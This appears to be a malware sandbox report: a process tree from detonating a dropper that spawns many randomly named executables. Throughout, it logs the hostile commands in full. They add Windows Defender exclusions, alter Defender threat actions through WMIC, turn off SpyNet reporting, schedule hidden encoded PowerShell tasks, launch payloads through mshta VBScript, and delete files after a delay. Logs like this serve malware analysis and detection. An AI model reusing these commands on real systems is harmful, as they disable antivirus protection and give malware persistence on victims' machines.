C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun1917b8fb5f09db8.exeSun1917b8fb5f09db8.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\vlIqRV07HW3kqFelCZOkt0MM.exe"C:\Users\Admin\Documents\vlIqRV07HW3kqFelCZOkt0MM.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\vlIqRV07HW3kqFelCZOkt0MM.exe"C:\Users\Admin\Documents\vlIqRV07HW3kqFelCZOkt0MM.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10836 -s 10767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\WTiHSAoOx_dy7OYTEgv2_0xJ.exe"C:\Users\Admin\Documents\WTiHSAoOx_dy7OYTEgv2_0xJ.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10828 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\_FN2uAQi_DUvoSKH655mbuGd.exe"C:\Users\Admin\Documents\_FN2uAQi_DUvoSKH655mbuGd.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\SybJG571i76TzTlmcO2BDMTX.exe"C:\Users\Admin\Documents\SybJG571i76TzTlmcO2BDMTX.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\SybJG571i76TzTlmcO2BDMTX.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\qzpuyrRTVoGc4Mc2AKxk6pTB.exe"C:\Users\Admin\Documents\qzpuyrRTVoGc4Mc2AKxk6pTB.exe"6⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵
-
C:\Users\Admin\Documents\McZNZuHmXVept6V_imMf5nhy.exe"C:\Users\Admin\Documents\McZNZuHmXVept6V_imMf5nhy.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10980 -s 2447⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\TEhD1bOy1S_w6Qmtqwurmrov.exe"C:\Users\Admin\Documents\TEhD1bOy1S_w6Qmtqwurmrov.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10964 -s 3007⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\UjiLOTXyPPXuCIfjslQsNvr0.exe"C:\Users\Admin\Documents\UjiLOTXyPPXuCIfjslQsNvr0.exe"6⤵
-
C:\Users\Admin\Documents\UjiLOTXyPPXuCIfjslQsNvr0.exe"C:\Users\Admin\Documents\UjiLOTXyPPXuCIfjslQsNvr0.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\Bandicam.exe"C:\Users\Admin\AppData\Local\Temp\Bandicam.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops startup file
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\ProgramData9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10956 -s 11007⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\Documents\AM5Isb_OcTUzof9dlnE4LHY2.exe"C:\Users\Admin\Documents\AM5Isb_OcTUzof9dlnE4LHY2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\AM5Isb_OcTUzof9dlnE4LHY2.exeC:\Users\Admin\Documents\AM5Isb_OcTUzof9dlnE4LHY2.exe7⤵
-
C:\Users\Admin\Documents\LK2tJGajftEeLSBc6rXxeDhR.exe"C:\Users\Admin\Documents\LK2tJGajftEeLSBc6rXxeDhR.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\LK2tJGajftEeLSBc6rXxeDhR.exe"C:\Users\Admin\Documents\LK2tJGajftEeLSBc6rXxeDhR.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\2Y2DEk6oDEFLyMtOS38apbFJ.exe"C:\Users\Admin\Documents\2Y2DEk6oDEFLyMtOS38apbFJ.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\g8jK8Nc4X720rkaOYB5E3fUo.exe"C:\Users\Admin\Documents\g8jK8Nc4X720rkaOYB5E3fUo.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS3406.tmp\Install.exe.\Install.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS529A.tmp\Install.exe.\Install.exe /S /site_id "394347"8⤵
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gMDkBOWni" /SC once /ST 00:09:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bOoGaaDxESFbryPOAb" /SC once /ST 22:26:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\GbZKNkl.exe\" tt /site_id 394347 /S" /V1 /F9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\NvFpLBktsm80qNBGvVjgkMFp.exe"C:\Users\Admin\Documents\NvFpLBktsm80qNBGvVjgkMFp.exe"6⤵
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵
-
C:\Users\Admin\Documents\9I1ihc4cehKJ8SMQDWIdldIi.exe"C:\Users\Admin\Documents\9I1ihc4cehKJ8SMQDWIdldIi.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS952C.tmp\Install.exe.\Install.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSB1CD.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gUdBQjRTk" /SC once /ST 09:37:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bOoGaaDxESFbryPOAb" /SC once /ST 22:28:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\UkDhUcD.exe\" tt /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\ENArBPOMgh3hGaXM2KMYF4xS.exe"C:\Users\Admin\Documents\ENArBPOMgh3hGaXM2KMYF4xS.exe"8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Users\Admin\Documents\qz1g6FwKh2_0rwbOwBR3xZ5a.exe"C:\Users\Admin\Documents\qz1g6FwKh2_0rwbOwBR3xZ5a.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11000 -s 2609⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\bIp1yoESzg4Kx9i3VHOo82l7.exe"C:\Users\Admin\Documents\bIp1yoESzg4Kx9i3VHOo82l7.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6284 -s 2569⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\9A0WhBZPdz28q8nGDw7zbaoO.exe"C:\Users\Admin\Documents\9A0WhBZPdz28q8nGDw7zbaoO.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScrIPt:CLoSe (cREATEobjEcT("WscRIpt.SHEll"). RUn ( "cMD.exe /q /c CoPY /Y ""C:\Users\Admin\Documents\9A0WhBZPdz28q8nGDw7zbaoO.exe"" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh & If """" =="""" for %R IN ( ""C:\Users\Admin\Documents\9A0WhBZPdz28q8nGDw7zbaoO.exe"" ) do taskkill -im ""%~nXR"" /f" ,0 , TRUE))7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c CoPY /Y "C:\Users\Admin\Documents\9A0WhBZPdz28q8nGDw7zbaoO.exe" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh &If "" =="" for %R IN ( "C:\Users\Admin\Documents\9A0WhBZPdz28q8nGDw7zbaoO.exe" ) do taskkill -im "%~nXR" /f8⤵
-
C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXEY1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScrIPt:CLoSe (cREATEobjEcT("WscRIpt.SHEll"). RUn ( "cMD.exe /q /c CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE"" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh & If ""/pPcO7dQJSv4ebP1WI9YNCeWEF27pAh "" =="""" for %R IN ( ""C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE"" ) do taskkill -im ""%~nXR"" /f" ,0 , TRUE))10⤵
-
